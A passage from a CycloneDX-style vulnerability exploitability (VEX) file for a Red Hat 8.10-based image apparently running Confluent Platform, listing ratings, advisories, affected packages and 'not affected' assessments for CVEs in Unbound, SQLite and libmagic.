          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        755,
        908
      ],
      "description": "Unbound before 1.9.4 accesses uninitialized memory, which allows remote attackers to trigger a crash via a crafted NOTIFY query. The source IP address of the query must match an access-control rule.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-16866"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-16866"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/blob/release-1.9.4/doc/Changelog"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E65NCWZZB2D75ZIYWPXKMVGSGNYW4JMC/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MLRHE7TQFAOV4MB2ELTOGESZYUL65NUJ/"
        },
        {
          "url": "https://nlnetlabs.nl/downloads/unbound/CVE-2019-16866.txt"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16866"
        },
        {
          "url": "https://seclists.org/bugtraq/2019/Oct/23"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4149-1"
        },
        {
          "url": "https://usn.ubuntu.com/4149-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-16866"
        },
        {
          "url": "https://www.debian.org/security/2019/dsa-4544"
        }
      ],
      "published": "2019-10-03T19:15:09+00:00",
      "updated": "2026-06-17T02:22:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-19244",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "sqlite3Select in select.c in SQLite 3.30.1 allows a crash if a sub-select uses both DISTINCT and window functions, and also has certain ORDER BY usage.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-19244"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-19244"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
        },
        {
          "url": "https://github.com/sqlite/sqlite/commit/e59c562b3f6894f84c715772c4b116d7b5c01348"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19244"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4205-1"
        },
        {
          "url": "https://usn.ubuntu.com/4205-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-19244"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
        }
      ],
      "published": "2019-11-25T20:15:11+00:00",
      "updated": "2026-06-17T02:26:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-8905",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.6,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "do_core_note in readelf.c in libmagic.a in file 5.35 has a stack-based buffer over-read, related to file_printable, a different vulnerability than CVE-2018-10360.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-8905"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00027.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00053.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107137"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-8905"
        },
        {
          "url": "https://bugs.astron.com/view.php?id=63"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2019/02/msg00044.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8905"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3911-1"
        },
        {
          "url": "https://usn.ubuntu.com/3911-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-8905"
        }
      ],
      "published": "2019-02-18T17:29:00+00:00",
      "updated": "2026-06-17T02:42:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.33-27.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable.\nFor python:"
      }
    },
    {
      "id": "CVE-2019-8906",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.6,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "do_core_note in readelf.c in libmagic.a in file 5.35 has an out-of-bounds read because memcpy is misused.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-8906"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00027.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00053.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-8906"
        },
        {
          "url": "https://bugs.astron.com/view.php?id=64"
        },
        {
          "url": "https://github.com/file/file/commit/2858eaf99f6cc5aae129bcbf1e24ad160240185f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8906"
        },
        {
          "url": "https://support.apple.com/kb/HT209599"
        },
        {
          "url": "https://support.apple.com/kb/HT209600"
        },
        {
          "url": "https://support.apple.com/kb/HT209601"
        },
        {
          "url": "https://support.apple.com/kb/HT209602"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3911-1"
        },
        {
          "url": "https://usn.ubuntu.com/3911-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-8906"
        }
      ],
      "published": "2019-02-18T17:29:01+00:00",
      "updated": "2026-06-17T02:42:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.33-27.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
